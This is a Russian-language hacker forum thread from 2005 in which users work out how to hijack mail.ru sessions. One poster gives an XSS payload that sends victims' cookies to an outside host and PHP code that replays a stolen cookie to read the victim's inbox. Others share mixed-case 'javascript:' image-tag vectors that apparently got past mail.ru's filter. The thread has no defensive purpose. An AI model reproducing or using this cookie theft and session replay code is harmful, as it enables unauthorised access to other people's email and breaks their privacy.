Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.03.2005, 00:53
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Передача cookies
Вот встала у меня такая задача : имея куки допустим c mail.ru мне надо чтоб скрипт(php) передовал куки серверу и дальше лазил по ящику....
Подскажите возможнолт это реализовать ?
|
|
|
25.03.2005, 11:48
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
мож хоть кто ссылочку даст на описания таких куков ...
|
|
|
|
25.03.2005, 12:53
|
|
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909
Репутация:
62
|
|
Да, возможно. Нужно знать либо HTTP протокол, тогда fsockopen() и т.д. Либо юзать setcookie().
Мне более по душе первое  |
|
|
|
25.03.2005, 17:51
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Сообщение от LittleLamer
Да, возможно. Нужно знать либо HTTP протокол, тогда fsockopen() и т.д. Либо юзать setcookie().
Мне более по душе первое Это хорошо, что можно
Приведи примерчик плиз!!!
ну например для того же майл ру передаём
Код:
mrcu=C3DC424333243DD60E4D0100007F
Mpopl=1187863386
MailUser=1
|
|
|
|
25.03.2005, 21:22
|
|
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909
Репутация:
62
|
|
Например ты почил куки таким (или похожим) способом:
Код:
<img src="javascript:img=new Image();img.src='http://mysite.com/xxx.php?cooki='+escape(document.cookie)">
(для маила это конечно не работает, это для примера)
PHP код:
$cooki=$_GET["cooki"];
$req="GET /cgi-bin/msglist?folder=0 HTTP/1.0\r\nHost: win.mail.ru\r\nReferer: http://win.mai.ru/cgi-bin/msglist?folder=0\r\nCookie: ".$cooki."\r\n\r\n";
$f=fsockopen("win.mail.ru", 80);
fwrite($f, $req);
$dt="";
while (!feof($f))
$dt.=fread($f, 1024);
fclose($f);
Терь в $dt будет содержаться содержимое страницы /cgi-bin/msglist?folder=0 (это список последних писем в папке Входящие)
P.S.: за понятность написанного ответственность нести не хочу 
Последний раз редактировалось LittleLamer; 25.03.2005 в 21:24..
|
|
|
|
25.03.2005, 21:24
|
|
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909
Репутация:
62
|
|
И ещё. Ты в майле xss какой нить знаешь?
|
|
|
|
25.03.2005, 23:18
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Почти всё нонятно, токо есть несколько вопросов
1) Зачем здесь точки и два перевода строки Cookie: ".$cooki."\r\n\r\n";
2) И здесь зачем точка после $dt.=
Вроде по синтаксису можно без них... или я неправ ?
3) маил ру ща JaVaScRiPt пропускает
|
|
|
|
26.03.2005, 00:30
|
|
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909
Репутация:
62
|
|
1) два перевода строки - это спецификация HTTP протокола и означает конец запроса
2)
Код:
$dt.=fread($f, 1024)
это в php означает увеличения строки $dt на прочитанное из сокета $f. Т.е. если точки не было бы, то в конце цикла в $dt хранилось бы не всё содержимое страницы, а только самая последняя часть
3)
Код:
<img src=JaVaScRiPt:alert()>
(JaVaScRiPt "дословно")
mail.ru это не пропускает, уточни плиз |
|
|
|
26.03.2005, 01:04
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
1) а здесть то зачем точки .$cooki. ?
2) тег img на mail.ru всегда фильтровался, а image нет
так вот работает :
<image src=JaVaScRiPt:alert()>
JaVaScRiPt - разными регистрами
Последний раз редактировалось Майор; 26.03.2005 в 01:08..
|
|
|
|
26.03.2005, 02:46
|
|
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909
Репутация:
62
|
|
точки - это в php строки складываются |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
